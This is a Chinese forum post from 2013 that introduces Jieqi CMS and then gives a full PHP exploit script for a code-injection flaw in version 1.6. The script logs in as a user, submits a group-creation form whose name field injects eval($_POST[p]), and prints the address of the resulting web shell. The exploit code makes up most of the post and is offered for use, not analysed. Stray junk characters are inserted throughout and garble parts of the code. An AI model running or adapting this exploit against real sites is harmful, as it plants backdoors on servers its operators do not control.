杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。& Q# q; ?4 w" \/ L4 E
* V0 k+ K1 u* c4 h; C& t! k
' o, k& G1 k% S
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。" M2 ]3 l1 F+ f3 V h
需要有一个能创建圈子的用户。
3 u: L( z6 D0 G 2 ?) Z/ J6 ~; \+ ?' N1 t. s* w
<?php
+ K/ G+ N/ [9 c0 j: D - H' O3 f2 u4 Z8 N7 H# K$ d
print_r('
4 f8 r; q6 w. Z5 A+---------------------------------------------------------------------------+
_6 s! v$ ^, I$ J3 q0 CJieqi CMS V1.6 PHP Code Injection Exploit) o9 d% W C0 c# @+ d% t3 w
by flyh4t
; e2 R, v& z9 k r: p2 Dmail: phpsec at hotmail dot com4 S- z. Q4 R2 t6 I6 q6 s+ U3 O
team: http://www.wolvez.org
# W; g3 d8 ~9 s' Q6 k0 s7 d. Y+---------------------------------------------------------------------------+( j8 x/ c2 r2 {; U' S- C/ l% T
'); /**7 ]; o+ |0 X n$ U8 |) ^
* works regardless of php.ini settings
" F/ D) I; ]' S, k*/ if ($argc < 5) { print_r('6 Z5 Z* N# e* C( p
+---------------------------------------------------------------------------+1 E4 D& Q3 |: p; z
Usage: php '.$argv[0].' host path username
) h6 D/ F% R+ L+ K" xhost: target server (ip/hostname)2 Q) ? H2 @. D$ r4 H2 L- m
path: path to jieqicms 1 t5 g$ o5 g8 F3 r* q
uasename: a username who can create group# Y/ ~& E0 P$ U0 p/ Q; R
Example:
6 a" U* M$ E4 Lphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password6 z9 G# S4 P$ _
+---------------------------------------------------------------------------+3 F8 B3 W5 ?5 e/ s3 M( N& ~0 ^
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
& y9 Q3 T0 k' l) j, AContent-Disposition: form-data; name="gname"
2 l/ w2 J0 {+ S* `7 o & z3 l3 n: k; }! x9 K/ E1 u" w( c2 U
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
! Y+ N7 q3 y0 F" |$ x! m3 `-----------------------------23281168279961
2 X+ A! e: V, X* k* `Content-Disposition: form-data; name="gcatid"
8 W9 e. i! h. ~- N
4 g- P: H D0 P/ V. }/ w) C1' G( J7 j4 u! r* S w% K9 A! t
-----------------------------23281168279961
$ [2 Y* o5 y5 v5 j9 SContent-Disposition: form-data; name="gaudit": j7 ^5 ], i% r' y
3 _5 C. K) X! m$ V0 Y! |0 E; Y
1
; y8 k" D" }& H, r _-----------------------------23281168279961
3 ~; G# A: B3 S% C- xContent-Disposition: form-data; name="gbrief"1 Z- Z1 p' ]5 o" v
" R6 T R8 m+ h6 U* C2 c1- O1 [9 A, l6 _3 T& H
-----------------------------23281168279961--$ r1 f3 b: ?5 m
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
/ O2 u* V- V( g1 `
2 i7 f E6 j4 }preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对